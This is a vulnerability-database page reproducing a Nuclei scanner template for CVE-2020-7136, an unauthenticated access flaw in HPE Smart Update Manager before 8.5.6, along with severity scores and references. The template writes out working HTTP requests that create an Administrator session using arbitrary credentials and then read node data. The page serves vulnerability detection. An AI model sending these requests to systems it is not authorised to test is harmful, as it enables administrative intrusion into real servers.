Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-7136
HistoryJan 11, 2022 - 6:39 a.m.

HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access

2022-01-1106:39:41
ProjectDiscovery
github.com
1
cve
cve2020
hp
auth-bypass
hpe
tenable

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.4

Confidence

High

EPSS

0.262

Percentile

96.8%

HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.

id: CVE-2020-7136

info:
  name: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
  author: gy741
  severity: critical
  description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.
  impact: |
    An attacker can gain unauthorized access to the HPE Smart Update Manager, potentially leading to further compromise of the system.
  remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
  reference:
    - https://www.tenable.com/security/research/tra-2020-02
    - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7136
    - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-7136
    cwe-id: CWE-288
    epss-score: 0.26929
    epss-percentile: 0.96763
    cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hpe
    product: smart_update_manager
  tags: cve,cve2020,hp,auth-bypass,hpe,tenable

http:
  - raw:
      - |
        POST /session/create HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}
      - |
        GET /session/{{sessionid}}/node/index HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "hmessage"
          - "Command completed successfully."
          - "node_name"
        condition: and

    extractors:
      - type: regex
        name: sessionid
        group: 1
        regex:
          - '"sessionId":"([a-z0-9.]+)"'
        internal: true
        part: body
# digest: 4a0a0047304502202f21a3589f99bf14fc6554b6dffad8b24bfa290932eff97c788ee82cbfbda667022100da8948a7b02d1255b30707f199eb686e5ef751ed789ea86ef814de2f086b6bc1:922c64590222798bb761d5b6d8e72950

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.4

Confidence

High

EPSS

0.262

Percentile

96.8%

Related for NUCLEI:CVE-2020-7136